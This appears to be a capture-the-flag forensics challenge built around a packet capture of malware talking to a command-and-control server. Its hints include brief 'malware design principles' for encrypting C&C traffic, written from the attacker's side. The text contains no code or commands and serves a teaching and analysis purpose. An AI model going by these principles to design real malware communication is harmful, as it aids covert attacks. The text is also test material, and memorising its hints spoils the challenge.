Clara_62f0b78d6dea918a20ba2965e9103c5098307969.pcapng

Hint1

Defender: Malware Detected !!

WTF, someone is monitoring me ?!

There are several encrypted data sent, but they looks a little be weird ?

Hint2

Keyword: malware, monitor, encrypted data

The two malicious conversations sent exactly the same things. The connection between malware and C&C are broken one time.

Hint3

Malware Design Principle
Communication

  • Make sure that everything is encrypted.
  • Use static key or do key exchange in the beginning.
  • Socket is suck, C&C should know what and how you send in advance.

There are several files sent together in each conversation. As a malware developer, how would you design the communication between malware and C&C ?